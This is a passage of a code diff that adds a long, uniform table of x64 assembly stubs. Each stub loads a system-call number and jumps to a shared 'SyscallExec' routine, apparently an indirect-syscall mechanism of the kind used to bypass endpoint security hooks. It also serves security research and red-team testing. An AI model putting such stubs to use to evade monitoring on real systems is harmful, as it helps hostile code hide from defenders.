+ mov rax, SyscallExec
+ push rax
+ mov rax, 0110h
+ ret
+ nop
+ Fnc0110 ENDP
+
+ Fnc0111 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0111h
+ ret
+ nop
+ Fnc0111 ENDP
+
+ Fnc0112 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0112h
+ ret
+ nop
+ Fnc0112 ENDP
+
+ Fnc0113 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0113h
+ ret
+ nop
+ Fnc0113 ENDP
+
+ Fnc0114 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0114h
+ ret
+ nop
+ Fnc0114 ENDP
+
+ Fnc0115 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0115h
+ ret
+ nop
+ Fnc0115 ENDP
+
+ Fnc0116 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0116h
+ ret
+ nop
+ Fnc0116 ENDP
+
+ Fnc0117 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0117h
+ ret
+ nop
+ Fnc0117 ENDP
+
+ Fnc0118 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0118h
+ ret
+ nop
+ Fnc0118 ENDP
+
+ Fnc0119 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0119h
+ ret
+ nop
+ Fnc0119 ENDP
+
+ Fnc011A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 011ah
+ ret
+ nop
+ Fnc011A ENDP
+
+ Fnc011B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 011bh
+ ret
+ nop
+ Fnc011B ENDP
+
+ Fnc011C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 011ch
+ ret
+ nop
+ Fnc011C ENDP
+
+ Fnc011D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 011dh
+ ret
+ nop
+ Fnc011D ENDP
+
+ Fnc011E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 011eh
+ ret
+ nop
+ Fnc011E ENDP
+
+ Fnc011F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 011fh
+ ret
+ nop
+ Fnc011F ENDP
+
+ Fnc0120 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0120h
+ ret
+ nop
+ Fnc0120 ENDP
+
+ Fnc0121 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0121h
+ ret
+ nop
+ Fnc0121 ENDP
+
+ Fnc0122 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0122h
+ ret
+ nop
+ Fnc0122 ENDP
+
+ Fnc0123 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0123h
+ ret
+ nop
+ Fnc0123 ENDP
+
+ Fnc0124 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0124h
+ ret
+ nop
+ Fnc0124 ENDP
+
+ Fnc0125 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0125h
+ ret
+ nop
+ Fnc0125 ENDP
+
+ Fnc0126 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0126h
+ ret
+ nop
+ Fnc0126 ENDP
+
+ Fnc0127 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0127h
+ ret
+ nop
+ Fnc0127 ENDP
+
+ Fnc0128 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0128h
+ ret
+ nop
+ Fnc0128 ENDP
+
+ Fnc0129 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0129h
+ ret
+ nop
+ Fnc0129 ENDP
+
+ Fnc012A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 012ah
+ ret
+ nop
+ Fnc012A ENDP
+
+ Fnc012B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 012bh
+ ret
+ nop
+ Fnc012B ENDP
+
+ Fnc012C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 012ch
+ ret
+ nop
+ Fnc012C ENDP
+
+ Fnc012D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 012dh
+ ret
+ nop
+ Fnc012D ENDP
+
+ Fnc012E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 012eh
+ ret
+ nop
+ Fnc012E ENDP
+
+ Fnc012F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 012fh
+ ret
+ nop
+ Fnc012F ENDP
+
+ Fnc0130 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0130h
+ ret
+ nop
+ Fnc0130 ENDP
+
+ Fnc0131 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0131h
+ ret
+ nop
+ Fnc0131 ENDP
+
+ Fnc0132 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0132h
+ ret
+ nop
+ Fnc0132 ENDP
+
+ Fnc0133 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0133h
+ ret
+ nop
+ Fnc0133 ENDP
+
+ Fnc0134 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0134h
+ ret
+ nop
+ Fnc0134 ENDP
+
+ Fnc0135 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0135h
+ ret
+ nop
+ Fnc0135 ENDP
+
+ Fnc0136 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0136h
+ ret
+ nop
+ Fnc0136 ENDP
+
+ Fnc0137 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0137h
+ ret
+ nop
+ Fnc0137 ENDP
+
+ Fnc0138 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0138h
+ ret
+ nop
+ Fnc0138 ENDP
+
+ Fnc0139 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0139h
+ ret
+ nop
+ Fnc0139 ENDP
+
+ Fnc013A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 013ah
+ ret
+ nop
+ Fnc013A ENDP
+
+ Fnc013B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 013bh
+ ret
+ nop
+ Fnc013B ENDP
+
+ Fnc013C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 013ch
+ ret
+ nop
+ Fnc013C ENDP
+
+ Fnc013D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 013dh
+ ret
+ nop
+ Fnc013D ENDP
+
+ Fnc013E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 013eh
+ ret
+ nop
+ Fnc013E ENDP
+
+ Fnc013F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 013fh
+ ret
+ nop
+ Fnc013F ENDP
+
+ Fnc0140 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0140h
+ ret
+ nop
+ Fnc0140 ENDP
+
+ Fnc0141 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0141h
+ ret
+ nop
+ Fnc0141 ENDP
+
+ Fnc0142 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0142h
+ ret
+ nop
+ Fnc0142 ENDP
+
+ Fnc0143 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0143h
+ ret
+ nop
+ Fnc0143 ENDP
+
+ Fnc0144 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0144h
+ ret
+ nop
+ Fnc0144 ENDP
+
+ Fnc0145 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0145h
+ ret
+ nop
+ Fnc0145 ENDP
+
+ Fnc0146 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0146h
+ ret
+ nop
+ Fnc0146 ENDP
+
+ Fnc0147 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0147h
+ ret
+ nop
+ Fnc0147 ENDP
+
+ Fnc0148 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0148h
+ ret
+ nop
+ Fnc0148 ENDP
+
+ Fnc0149 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0149h
+ ret
+ nop
+ Fnc0149 ENDP
+
+ Fnc014A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 014ah
+ ret
+ nop
+ Fnc014A ENDP
+
+ Fnc014B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 014bh
+ ret
+ nop
+ Fnc014B ENDP
+
+ Fnc014C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 014ch
+ ret
+ nop
+ Fnc014C ENDP
+
+ Fnc014D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 014dh
+ ret
+ nop
+ Fnc014D ENDP
+
+ Fnc014E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 014eh
+ ret
+ nop
+ Fnc014E ENDP
+
+ Fnc014F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 014fh
+ ret
+ nop
+ Fnc014F ENDP
+
+ Fnc0150 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0150h
+ ret
+ nop
+ Fnc0150 ENDP
+
+ Fnc0151 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0151h
+ ret
+ nop
+ Fnc0151 ENDP
+
+ Fnc0152 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0152h
+ ret
+ nop
+ Fnc0152 ENDP
+
+ Fnc0153 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0153h
+ ret
+ nop
+ Fnc0153 ENDP
+
+ Fnc0154 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0154h
+ ret
+ nop
+ Fnc0154 ENDP
+
+ Fnc0155 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0155h
+ ret
+ nop
+ Fnc0155 ENDP
+
+ Fnc0156 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0156h
+ ret
+ nop
+ Fnc0156 ENDP
+
+ Fnc0157 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0157h
+ ret
+ nop
+ Fnc0157 ENDP
+
+ Fnc0158 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0158h
+ ret
+ nop
+ Fnc0158 ENDP
+
+ Fnc0159 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0159h
+ ret
+ nop
+ Fnc0159 ENDP
+
+ Fnc015A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 015ah
+ ret
+ nop
+ Fnc015A ENDP
+
+ Fnc015B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 015bh
+ ret
+ nop
+ Fnc015B ENDP
+
+ Fnc015C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 015ch
+ ret
+ nop
+ Fnc015C ENDP
+
+ Fnc015D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 015dh
+ ret
+ nop
+ Fnc015D ENDP
+
+ Fnc015E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 015eh
+ ret
+ nop
+ Fnc015E ENDP
+
+ Fnc015F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 015fh
+ ret
+ nop
+ Fnc015F ENDP
+
+ Fnc0160 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0160h
+ ret
+ nop
+ Fnc0160 ENDP
+
+ Fnc0161 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0161h
+ ret
+ nop
+ Fnc0161 ENDP
+
+ Fnc0162 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0162h
+ ret
+ nop
+ Fnc0162 ENDP
+
+ Fnc0163 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0163h
+ ret
+ nop
+ Fnc0163 ENDP
+
+ Fnc0164 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0164h
+ ret
+ nop
+ Fnc0164 ENDP
+
+ Fnc0165 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0165h
+ ret
+ nop
+ Fnc0165 ENDP
+
+ Fnc0166 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0166h
+ ret
+ nop
+ Fnc0166 ENDP
+
+ Fnc0167 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0167h
+ ret
+ nop
+ Fnc0167 ENDP
+
+ Fnc0168 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0168h
+ ret
+ nop
+ Fnc0168 ENDP
+
+ Fnc0169 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0169h
+ ret
+ nop
+ Fnc0169 ENDP
+
+ Fnc016A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 016ah
+ ret
+ nop
+ Fnc016A ENDP
+
+ Fnc016B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 016bh
+ ret
+ nop
+ Fnc016B ENDP
+
+ Fnc016C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 016ch
+ ret
+ nop
+ Fnc016C ENDP
+
+ Fnc016D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 016dh
+ ret
+ nop
+ Fnc016D ENDP
+
+ Fnc016E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 016eh
+ ret
+ nop
+ Fnc016E ENDP
+
+ Fnc016F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 016fh
+ ret
+ nop
+ Fnc016F ENDP
+
+ Fnc0170 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0170h
+ ret
+ nop
+ Fnc0170 ENDP
+
+ Fnc0171 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0171h
+ ret
+ nop
+ Fnc0171 ENDP
+
+ Fnc0172 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0172h
+ ret
+ nop
+ Fnc0172 ENDP
+
+ Fnc0173 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0173h
+ ret
+ nop
+ Fnc0173 ENDP
+
+ Fnc0174 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0174h
+ ret
+ nop
+ Fnc0174 ENDP
+
+ Fnc0175 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0175h
+ ret
+ nop
+ Fnc0175 ENDP
+
+ Fnc0176 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0176h
+ ret
+ nop
+ Fnc0176 ENDP
+
+ Fnc0177 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0177h
+ ret
+ nop
+ Fnc0177 ENDP
+
+ Fnc0178 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0178h
+ ret
+ nop
+ Fnc0178 ENDP
+
+ Fnc0179 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0179h
+ ret
+ nop
+ Fnc0179 ENDP
+
+ Fnc017A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 017ah
+ ret
+ nop
+ Fnc017A ENDP
+
+ Fnc017B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 017bh
+ ret
+ nop
+ Fnc017B ENDP
+
+ Fnc017C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 017ch
+ ret
+ nop
+ Fnc017C ENDP
+
+ Fnc017D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 017dh
+ ret
+ nop
+ Fnc017D ENDP
+
+ Fnc017E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 017eh
+ ret
+ nop
+ Fnc017E ENDP
+
+ Fnc017F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 017fh
+ ret
+ nop
+ Fnc017F ENDP
+
+ Fnc0180 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0180h
+ ret
+ nop
+ Fnc0180 ENDP
+
+ Fnc0181 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0181h
+ ret
+ nop
+ Fnc0181 ENDP
+
+ Fnc0182 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0182h
+ ret
+ nop
+ Fnc0182 ENDP
+
+ Fnc0183 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0183h
+ ret
+ nop
+ Fnc0183 ENDP
+
+ Fnc0184 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0184h
+ ret
+ nop
+ Fnc0184 ENDP
+
+ Fnc0185 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0185h
+ ret
+ nop
+ Fnc0185 ENDP
+
+ Fnc0186 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0186h
+ ret
+ nop
+ Fnc0186 ENDP
+
+ Fnc0187 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0187h
+ ret
+ nop
+ Fnc0187 ENDP
+
+ Fnc0188 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0188h
+ ret
+ nop
+ Fnc0188 ENDP
+
+ Fnc0189 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0189h
+ ret
+ nop
+ Fnc0189 ENDP
+
+ Fnc018A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 018ah
+ ret
+ nop
+ Fnc018A ENDP
+
+ Fnc018B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 018bh
+ ret
+ nop
+ Fnc018B ENDP
+
+ Fnc018C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 018ch
+ ret
+ nop
+ Fnc018C ENDP
+
+ Fnc018D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 018dh
+ ret
+ nop
+ Fnc018D ENDP
+
+ Fnc018E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 018eh
+ ret
+ nop
+ Fnc018E ENDP
+
+ Fnc018F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 018fh
+ ret
+ nop
+ Fnc018F ENDP
+
+ Fnc0190 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0190h
+ ret
+ nop
+ Fnc0190 ENDP
+
+ Fnc0191 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0191h
+ ret
+ nop
+ Fnc0191 ENDP
+
+ Fnc0192 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0192h
+ ret
+ nop
+ Fnc0192 ENDP
+
+ Fnc0193 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0193h
+ ret
+ nop
+ Fnc0193 ENDP
+
+ Fnc0194 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0194h
+ ret
+ nop
+ Fnc0194 ENDP
+
+ Fnc0195 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0195h
+ ret
+ nop
+ Fnc0195 ENDP
+
+ Fnc0196 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0196h
+ ret
+ nop
+ Fnc0196 ENDP
+
+ Fnc0197 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0197h
+ ret
+ nop
+ Fnc0197 ENDP
+
+ Fnc0198 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0198h
+ ret
+ nop
+ Fnc0198 ENDP
+
+ Fnc0199 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0199h
+ ret
+ nop
+ Fnc0199 ENDP
+
+ Fnc019A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 019ah
+ ret
+ nop
+ Fnc019A ENDP
+
+ Fnc019B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 019bh
+ ret
+ nop
+ Fnc019B ENDP
+
+ Fnc019C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 019ch
+ ret
+ nop
+ Fnc019C ENDP
+
+ Fnc019D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 019dh
+ ret
+ nop
+ Fnc019D ENDP
+
+ Fnc019E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 019eh
+ ret
+ nop
+ Fnc019E ENDP
+
+ Fnc019F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 019fh
+ ret
+ nop
+ Fnc019F ENDP
+
+ Fnc01A0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a0h
+ ret
+ nop
+ Fnc01A0 ENDP
+
+ Fnc01A1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a1h
+ ret
+ nop
+ Fnc01A1 ENDP
+
+ Fnc01A2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a2h
+ ret
+ nop
+ Fnc01A2 ENDP
+
+ Fnc01A3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a3h
+ ret
+ nop
+ Fnc01A3 ENDP
+
+ Fnc01A4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a4h
+ ret
+ nop
+ Fnc01A4 ENDP
+
+ Fnc01A5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a5h
+ ret
+ nop
+ Fnc01A5 ENDP
+
+ Fnc01A6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a6h
+ ret
+ nop
+ Fnc01A6 ENDP
+
+ Fnc01A7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a7h
+ ret
+ nop
+ Fnc01A7 ENDP
+
+ Fnc01A8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a8h
+ ret
+ nop
+ Fnc01A8 ENDP
+
+ Fnc01A9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a9h
+ ret
+ nop
+ Fnc01A9 ENDP
+
+ Fnc01AA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01aah
+ ret
+ nop
+ Fnc01AA ENDP
+
+ Fnc01AB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01abh
+ ret
+ nop
+ Fnc01AB ENDP
+
+ Fnc01AC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01ach
+ ret
+ nop
+ Fnc01AC ENDP
+
+ Fnc01AD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01adh
+ ret
+ nop
+ Fnc01AD ENDP
+
+ Fnc01AE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01aeh
+ ret
+ nop
+ Fnc01AE ENDP
+
+ Fnc01AF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01afh
+ ret
+ nop
+ Fnc01AF ENDP
+
+ Fnc01B0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b0h
+ ret
+ nop
+ Fnc01B0 ENDP
+
+ Fnc01B1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b1h
+ ret
+ nop
+ Fnc01B1 ENDP
+
+ Fnc01B2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b2h
+ ret
+ nop
+ Fnc01B2 ENDP
+
+ Fnc01B3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b3h
+ ret
+ nop
+ Fnc01B3 ENDP
+
+ Fnc01B4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b4h
+ ret
+ nop
+ Fnc01B4 ENDP
+
+ Fnc01B5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b5h
+ ret
+ nop
+ Fnc01B5 ENDP
+
+ Fnc01B6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b6h
+ ret
+ nop
+ Fnc01B6 ENDP
+
+ Fnc01B7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b7h
+ ret
+ nop
+ Fnc01B7 ENDP
+
+ Fnc01B8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b8h
+ ret
+ nop
+ Fnc01B8 ENDP
+
+ Fnc01B9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b9h
+ ret
+ nop
+ Fnc01B9 ENDP
+
+ Fnc01BA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01bah
+ ret
+ nop
+ Fnc01BA ENDP
+
+ Fnc01BB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01bbh
+ ret
+ nop
+ Fnc01BB ENDP
+
+ Fnc01BC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01bch
+ ret
+ nop
+ Fnc01BC ENDP
+
+ Fnc01BD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01bdh
+ ret
+ nop
+ Fnc01BD ENDP
+
+ Fnc01BE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01beh
+ ret
+ nop
+ Fnc01BE ENDP
+
+ Fnc01BF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01bfh
+ ret
+ nop
+ Fnc01BF ENDP
+
+ Fnc01C0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c0h
+ ret
+ nop
+ Fnc01C0 ENDP
+
+ Fnc01C1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c1h
+ ret
+ nop
+ Fnc01C1 ENDP
+
+ Fnc01C2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c2h
+ ret
+ nop
+ Fnc01C2 ENDP
+
+ Fnc01C3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c3h
+ ret
+ nop
+ Fnc01C3 ENDP
+
+ Fnc01C4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c4h
+ ret
+ nop
+ Fnc01C4 ENDP
+
+ Fnc01C5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c5h
+ ret
+ nop
+ Fnc01C5 ENDP
+
+ Fnc01C6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c6h
+ ret
+ nop
+ Fnc01C6 ENDP
+
+ Fnc01C7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c7h
+ ret
+ nop
+ Fnc01C7 ENDP
+
+ Fnc01C8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c8h
+ ret
+ nop
+ Fnc01C8 ENDP
+
+ Fnc01C9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c9h
+ ret
+ nop
+ Fnc01C9 ENDP
+
+ Fnc01CA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01cah
+ ret
+ nop
+ Fnc01CA ENDP
+
+ Fnc01CB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01cbh
+ ret
+ nop
+ Fnc01CB ENDP
+
+ Fnc01CC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01cch
+ ret
+ nop
+ Fnc01CC ENDP
+
+ Fnc01CD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01cdh
+ ret
+ nop
+ Fnc01CD ENDP
+
+ Fnc01CE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01ceh
+ ret
+ nop
+ Fnc01CE ENDP
+
+ Fnc01CF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01cfh
+ ret
+ nop
+ Fnc01CF ENDP
+
+ Fnc01D0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d0h
+ ret
+ nop
+ Fnc01D0 ENDP
+
+ Fnc01D1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d1h
+ ret
+ nop
+ Fnc01D1 ENDP
+
+ Fnc01D2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d2h
+ ret
+ nop
+ Fnc01D2 ENDP
+
+ Fnc01D3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d3h
+ ret
+ nop
+ Fnc01D3 ENDP
+
+ Fnc01D4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d4h
+ ret
+ nop
+ Fnc01D4 ENDP
+
+ Fnc01D5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d5h
+ ret
+ nop
+ Fnc01D5 ENDP
+
+ Fnc01D6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d6h
+ ret
+ nop
+ Fnc01D6 ENDP
+
+ Fnc01D7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d7h
+ ret
+ nop
+ Fnc01D7 ENDP
+
+ Fnc01D8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d8h
+ ret
+ nop
+ Fnc01D8 ENDP
+
+ Fnc01D9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d9h
+ ret
+ nop
+ Fnc01D9 ENDP
+
+ Fnc01DA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01dah
+ ret
+ nop
+ Fnc01DA ENDP
+
+ Fnc01DB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01dbh
+ ret
+ nop
+ Fnc01DB ENDP
+
+ Fnc01DC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01dch
+ ret
+ nop
+ Fnc01DC ENDP
+
+ Fnc01DD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01ddh
+ ret
+ nop
+ Fnc01DD ENDP
+
+ Fnc01DE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01deh
+ ret
+ nop
+ Fnc01DE ENDP
+
+ Fnc01DF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01dfh
+ ret
+ nop
+ Fnc01DF ENDP
+
+ Fnc01E0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e0h
+ ret
+ nop
+ Fnc01E0 ENDP
+
+ Fnc01E1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e1h
+ ret
+ nop
+ Fnc01E1 ENDP
+
+ Fnc01E2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e2h
+ ret
+ nop
+ Fnc01E2 ENDP
+
